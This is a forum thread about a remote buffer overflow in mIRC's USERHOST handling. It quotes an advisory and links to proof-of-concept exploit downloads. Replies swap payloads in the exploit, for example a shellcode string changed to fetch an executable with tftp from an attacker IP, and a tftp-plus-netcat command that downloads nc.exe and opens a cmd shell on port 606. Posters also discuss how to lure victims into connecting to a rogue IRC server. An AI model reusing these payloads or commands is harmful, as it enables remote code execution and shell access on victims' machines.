works like charm


10x

It has been reported that mIRC may be prone to a remote buffer overflow vulnerability due to insufficient boundary checking. The issue is reported to present itself when the client attempts to connect to a remote server. During the connection process the client is reported to a send a USERHOST request that is expected to be less than 110 bytes. A buffer overflow condition may occur if the server responds with a request that is larger than 110 bytes.

Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the client in order to gain unauthorized access to a vulnerable system.

mIRC versions 6.01 to 6.1 have been reported to be prone to this issue, however other versions may be affected as well.

Exploit code has been provided and can be downloaded from the following location:

http://whiteroof.netfirms.com/userhost.zip
=======================
http://online.securityfocus.com/bid/8728

Hmmm...I tried this proof of concept on my own pc. I connected to my pc with mirc. However it just crashed mirc without actually spawning a shell.

only ver 6.1 is exploited and no u cant get a shell with this proof of concept
but i guess u can just put your own Shell

Hmm, yea

calc.exe ran .. (6.03 over here) does anyone know how thise proof of concept works and how anyone could put it ohter shellcode?

grtz,

linx

thx

no need to do that.already ssucceed to d/l it.
thanx anyway!

just kills mirc.exe (6.3)

db "tftp.exe -i 127.0.0.1 GET 1.exe c:\1.exe",0


but how can is start the .. 1.exe ??

get people to connect to the ircd on your ip

i ve changed

db "calc.exe",0

to

db "tftp.exe -i YOURIP GET 1.exe c:\1.exe",0

when somebody connect ... he download the 1.exe to his c:\ ...drive but how can i execute the 1.exe !!??

same thing here, anyone found a way yet?

tftp -i 127.0.0.1 get nc c:\nc.exe & c:\nc -vv -l -p 606 -e cmd

... that command works when I use it here in dos!
it downloads nc.exe and spawns a shell
but...
The exploit wont work anymore if I use that line
just tftp -i 127.0.0.1 get nc c:\nc.exe or just c:\nc -vv -l -p 606 -e cmd works fine but when using both the exploit fails

anyone ?

Hello i edit this exploit and he crash mIRC32 v5.91 .If you want you may edit this exploit and crash all version of mirc or 5.9 and 6.*

yes but how do we change this and make it run other file that calc.exe ?
(i want run a file on the remote system that exists)
i just don't know how...
i changed calc.exe with the full path and .exe i want and clicked save compile and finally encode but at last calc.exe is still called!!!
what should i do?

das no one know of *nix port for this code?

bleh damn visual basic!

i hate porting BASIC to Perl

can somebody help me?

http://www.securitylab.ru/_exploits/userhost.zip for those who missed.

It works. But since you have to have someone connected to your "ircd" server how this can be usefull ? How can you trap someone ? The best you can have is poor clients, never servers or domain controller...

Yo Agopsi

Sup Dawwwwg.

Damn, This Is A Nice Little Code Here I Am Sure If Can Gain Axx To Target Sys Maybe Can Run A /Script In Mirv Via Load Dump Remote File.

Good Post

Best Regards

V457 G5M T34M